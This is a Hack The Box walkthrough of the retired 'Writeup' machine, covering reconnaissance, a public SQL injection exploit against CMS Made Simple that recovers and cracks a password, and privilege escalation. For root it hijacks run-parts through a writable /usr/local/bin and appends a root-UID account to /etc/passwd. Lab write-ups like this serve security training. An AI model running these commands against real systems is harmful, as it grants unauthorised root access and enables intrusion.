HTB “ Writeup” Machine - Walkthrough
@cyberpj at HTB
Retired One, but you can access till July end :)
let’s get started
About: “WriteUP” machine which depends on CVE’s exploitation stuff
As usual, we start our scan with Nmap to get top open ports, service running, and more
sudo echo "10.10.10.138 Writeup.htb" >> /etc/hosts
└─$ ⚡sudo nmap -sC -sV 10.10.10.138 -oN full_scan
Nmap scan report for 10.10.10.138
The host is up (0.20s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| 2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
| 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_ 256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
open ports : 20-ssh, 80-http
lets starts with port 80
here dirb the http but before lets check the robots.txt to get something
As you see here, here is what we need!
Here its just a writeup blog scenario
dir enum - nothing too interesting
After checking its source code
Is there any vuln for this cms?
CMS Made Simple is a free, open-source content management system to provide developers,
programmers, and site owners a web-based development and administration area. In 2017 it won the > CMS Critic annual award for Best Open Source Content Management
First let’s check for the most common public exploit
CMS Made Simple < 2.2.10 - SQL Injection
even after converting to Unix you’ll face a module error
simply just remove the term color stuff
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: email@example.com
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9
Here we go
the –crack flag crack the hash so np
ssh -as- jkr
Enumerate all the files and directories to find any files which make sense
Use PsPy to check the processes which are running at the time!
pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc.
You can notice when you run pspy
Every successful ssh login :
Basically, run-parts(8) takes a directory as an argument. It will run every script that is found in this directory. For example, if you do a listing of /etc/cron. hourly , you’ll see that it’s a directory where you can put executable files to be run every hour.
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
1. we are in the group of staff!
jkr@writeup:~$ find / -group staff 2>/dev/null
staff members could write to /usr/local/bin
as default run-parts running in /bin/
jkr@writeup:~$ which run-parts
you can see /usr/local/bin/ is before /usr/bin
ls -la /usr/
drwxrwsr-x 10 root staff 4.0K Jul 26 12:25 local
jkr@writeup:/usr/local$ ls -la
drwxrwsr-x 10 root staff 4096 Jul 26 12:25 .
drwxr-xr-x 10 root root 4096 Apr 19 2019 ..
drwx-wsr-x 2 root staff 20480 Jul 26 12:54 bin
drwxrwsr-x 2 root staff 4096 Apr 19 2019 etc
drwxrwsr-x 2 root staff 4096 Apr 19 2019 games
drwxrwsr-x 2 root staff 4096 Apr 19 2019 include
drwxrwsr-x 4 root staff 4096 Apr 24 2019 lib
lrwxrwxrwx 1 root staff 9 Apr 19 2019 man -> share/man
drwx-wsr-x 2 root staff 12288 Jul 26 09:28 sbin
drwxrwsr-x 7 root staff 4096 Apr 19 2019 share
drwxrwsr-x 2 root staff 4096 Apr 19 2019 src
staff group had write permission into /bin
└─$ ⚡openssl passwd -1 root
jkr@writeup:/usr/local/bin$ nano run-parts
echo 'cyberpj:$1$tI6VOEDZ$wVcNyaPAUt7R06gAbMH3j.:0:0:root:/root:/bin/bash' >> /etc/passwd
jkr@writeup:/usr/local/bin$ chmod +x run-parts
jkr@writeup:/usr/local/bin$ which run-parts
now new ssh-login
└─$ ⚡ssh firstname.lastname@example.org
The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jul 26 13:22:26 2021 from 10.10.14.106
jkr@writeup:~$ su cyberpj
Password: (which is created in openssl)
note:do this priv esc quickly
htb , writeup walkthrough- @cyberpj